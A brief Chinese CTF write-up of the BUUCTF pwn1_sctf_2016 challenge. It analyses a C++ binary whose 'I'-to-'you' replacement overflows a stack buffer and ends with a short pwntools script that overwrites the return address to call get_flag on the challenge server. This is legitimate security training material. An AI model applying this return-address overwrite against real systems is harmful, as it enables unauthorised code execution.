BUUCTF pwn1_sctf_2016 1

代码分析

查看文件信息然后进行反汇编

BUUCTF pwn1_sctf_2016 1_第1张图片
关键信息

  • 32位
  • 栈不可执行

IDA反汇编
BUUCTF pwn1_sctf_2016 1_第2张图片
说实话,这个应该是C++编写的程序,C++基础还是不行,我硬是没看懂这个代码

我查了一下字符串

在这里插入图片描述

这里的get_flag是函数,另一个应该就是执行的一个命令了
到IDA中查找
BUUCTF pwn1_sctf_2016 1_第3张图片
BUUCTF pwn1_sctf_2016 1_第4张图片
TAB切换到汇编,再空格
BUUCTF pwn1_sctf_2016 1_第5张图片
先给他地址记下 08048F0D

这里网上说是把 I 换成 you导致了溢出,输入I就多出了2个字符,s的空间为32字节,足够我们溢出8字节了

EXP

s距离BP为0x3C ,0x3C / 3 = 20,我们只需要20个I就能到达BP的位置,然后 + 4个字节填充BP

from pwn import *

p = remote("node4.buuoj.cn",28244)
p.sendline(flat([b"I" * 20, b'a'*4, 0x08048F0D]))
p.interactive()

你可能感兴趣的:(#,pwn,网络安全,ctf,pwn)